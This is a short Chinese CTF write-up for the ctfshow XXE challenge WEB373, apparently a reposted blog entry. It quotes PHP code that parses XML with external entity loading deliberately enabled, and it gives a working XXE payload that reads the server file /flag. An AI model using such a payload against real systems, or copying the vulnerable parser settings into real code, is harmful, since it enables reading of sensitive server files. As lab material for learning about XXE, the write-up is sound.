ctfshow_XXE

文章目录

WEB373

这里先放看一下理解漏洞之 XXE 漏洞
在这里插入图片描述

error_reporting(0);
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
if(isset($xmlfile)){
    
    
    $dom = new DOMDocument();  //创建内部类Document对象
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);通过解析一个 XML 标签字符串来组成该文档。
    $creds = simplexml_import_dom($dom); //把 DOM 节点转换为 SimpleXMLElement 对象。
    $ctfshow = $creds->ctfshow;
    echo $ctfshow;
}
highlight_file(__FILE__);

这里直接放出payload:

<!DOCTYPE test [
<!ENTITY xxe SYSTEM "file:///flag">
]>
<yu22x>
<ctfshow>&xxe;</ctfshow>
</yu22x>

获得flag
在这里插入图片描述

WEB374

猜你喜欢

转载自blog.csdn.net/qq_45951598/article/details/113753663
xxe